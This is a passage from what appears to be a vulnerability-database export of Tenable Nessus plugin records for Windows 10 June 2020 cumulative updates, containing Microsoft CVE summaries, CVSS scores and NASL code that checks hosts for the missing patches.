a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. 
An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. 
The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. 
The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. 
An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4561621/windows-10-update-kb4561621\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89a45c0c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561621.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561621'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561621])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:06:53", "description": "The remote Windows host is missing security update 4560960. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows Diagnostics & feedback settings app handles objects in memory. An attacker who successfully exploited this vulnerability could cause additional diagnostic data from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. 
(CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. 
(CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. 
(CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. 
An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a Windows service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1265, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. 
(CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1277, CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. 
(CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could cause a system to stop responding. (CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when the Windows Spatial Data Service improperly handles objects in memory. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. 
(CVE-2020-1441)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1206", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1209", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1265", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348", "CVE-2020-1441"], "modified": "2023-03-06T00:00:00", "cpe": 
["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4560960.NASL", "href": "https://www.tenable.com/plugins/nessus/137254", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137254);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1206\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1209\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1248\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1265\",\n \"CVE-2020-1266\",\n \"CVE-2020-1268\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1273\",\n \"CVE-2020-1274\",\n \"CVE-2020-1275\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n 
